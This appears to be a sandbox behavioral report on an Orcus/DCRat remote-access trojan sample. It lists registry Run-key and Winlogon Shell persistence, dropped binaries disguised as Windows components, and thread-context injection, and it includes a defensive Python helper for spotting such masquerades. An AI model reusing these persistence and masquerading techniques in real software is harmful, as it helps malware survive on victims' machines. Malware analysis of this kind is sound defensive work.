| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
Orcus
Orcus family
Orcus main payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Orcurs Rat Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Recovery\\WindowsRE\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Security\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Internet Explorer\\SIGNUP\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default\\Templates\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Recovery\\WindowsRE\\taskhostw.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\security\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\uk-UA\\fontdrvhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Default User\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Recovery\\WindowsRE\\upfc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default\\Templates\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\uk-UA\\fontdrvhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Recovery\\WindowsRE\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Default User\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\security\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MpDefenderCoreProtion = "\"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Internet Explorer\\SIGNUP\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Recovery\\WindowsRE\\taskhostw.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Security\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MpDefenderCoreProtion = "\"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Recovery\\WindowsRE\\upfc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
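The two persistence tables above (the Winlogon `Shell` rewrites and the `Run` keys) share one pattern: every dropped binary borrows the name of a real Windows component (csrss.exe, conhost.exe, fontdrvhost.exe, sihost.exe, cmd.exe, upfc.exe, ...) but lives outside System32, in locations such as `C:\Recovery\WindowsRE`, `C:\Users\Default\Templates` or `C:\Program Files\Windows Defender`. The following Python is an added triage helper, not part of the sandbox report or the malware family's own code. It parses a Winlogon `Shell` string exactly as the report prints it, flags every entry beyond the default `explorer.exe`, and checks `Run` values for system-binary names launched from non-system directories. The `SYSTEM_BINARIES` list is an assumption of the example (it covers the names seen in this report, not every Windows image); the sample values are copied from the behavioral2 rows, shortened, plus one constructed benign `Run` entry as a control.

```python
import csv
from typing import Dict, List, Tuple

# Image names that legitimately live only under %SystemRoot%\System32 (or SysWOW64).
# Assumption of this example: the list covers the names this report shows being
# dropped elsewhere; extend it for your own environment.
SYSTEM_BINARIES = {
    "csrss.exe", "conhost.exe", "fontdrvhost.exe", "sihost.exe", "taskhostw.exe",
    "runtimebroker.exe", "dllhost.exe", "sppsvc.exe", "cmd.exe", "upfc.exe",
}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def parse_shell_value(value: str) -> List[str]:
    """Split a Winlogon Shell string such as
       explorer.exe, "C:\\Recovery\\WindowsRE\\upfc.exe", "C:\\Users\\Default\\Templates\\csrss.exe"
    into its entries. The format is comma separated with optional double quotes, which
    the csv module handles (skipinitialspace drops the blank after each comma)."""
    rows = list(csv.reader([value], skipinitialspace=True))
    if not rows:
        return []
    return [entry.strip() for entry in rows[0] if entry.strip()]


def split_path(path: str) -> Tuple[str, str]:
    """Return (directory, filename), both lower-cased, for a Windows path."""
    path = path.strip('"').lower()
    directory, _, name = path.rpartition("\\")
    return directory, name


def masquerade_reason(path: str) -> str:
    """Explain why a launch path looks like a masqueraded system binary, or return ''."""
    directory, name = split_path(path)
    if name in SYSTEM_BINARIES and directory not in SYSTEM_DIRS:
        return f"{name} outside System32: {path}"
    return ""


def audit_winlogon_shell(value: str) -> List[str]:
    """Flag every Shell entry other than the default explorer.exe. Winlogon starts each
    listed image at logon, so any extra entry is persistence wherever it points; the
    masquerade check only sharpens the reason."""
    findings = []
    for entry in parse_shell_value(value):
        if entry.lower() == "explorer.exe":
            continue
        findings.append(masquerade_reason(entry) or f"extra shell entry: {entry}")
    return findings


def run_value_image(command: str) -> str:
    """Extract the executable path from a Run value, honouring a quoted first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def audit_run_keys(run_values: Dict[str, str]) -> List[str]:
    """Flag Run-key values whose image name impersonates a system binary."""
    findings = []
    for name, command in run_values.items():
        reason = masquerade_reason(run_value_image(command))
        if reason:
            findings.append(f"Run\\{name}: {reason}")
    return findings


# Sample input copied from the report's behavioral2 rows (shortened to three entries).
SHELL_VALUE = (
    'explorer.exe, "C:\\Recovery\\WindowsRE\\upfc.exe", '
    '"C:\\Users\\Default\\Templates\\csrss.exe", '
    '"C:\\Program Files\\Windows Defender\\cmd.exe"'
)
# Two Run values from the report plus one constructed benign entry as a control.
RUN_VALUES = {
    "cmd": '"C:\\Program Files\\Windows Defender\\cmd.exe"',
    "csrss": '"C:\\Users\\Default\\Templates\\csrss.exe"',
    "OneDrive": '"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
}

if __name__ == "__main__":
    for finding in audit_winlogon_shell(SHELL_VALUE) + audit_run_keys(RUN_VALUES):
        print(finding)
```

On a live host the same functions can be fed the output of `Get-ItemProperty` on `HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon` and the HKLM/HKCU `Run` keys; the `Shell` value should normally be exactly `explorer.exe`, so any second entry is worth a look even before the path heuristic runs.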
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | \??\c:\Windows\System32\CSCD8D644E09FC241AA8996A8F16E59FB8.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\System32\8zj1cq.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2168 set thread context of 4504 | N/A | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Mail\MpDefenderCoreProtion.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Windows Mail\6127aafe535d1c | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Windows Multimedia Platform\cmd.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Windows Multimedia Platform\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Internet Explorer\SIGNUP\dllhost.exe | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files\Windows Security\cmd.exe | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files\Windows Security\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files\Windows Defender\cmd.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\e6c9b481da804f | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Internet Explorer\SIGNUP\5940a34987c991 | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\SIGNUP\66fc9ff0ee96c2 | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\0a1fd5f707cd16 | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\OfficeClickToRun.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\SIGNUP\sihost.exe | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files\Windows Defender\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\sppsvc.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\security\conhost.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Windows\security\088424020bedd6 | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
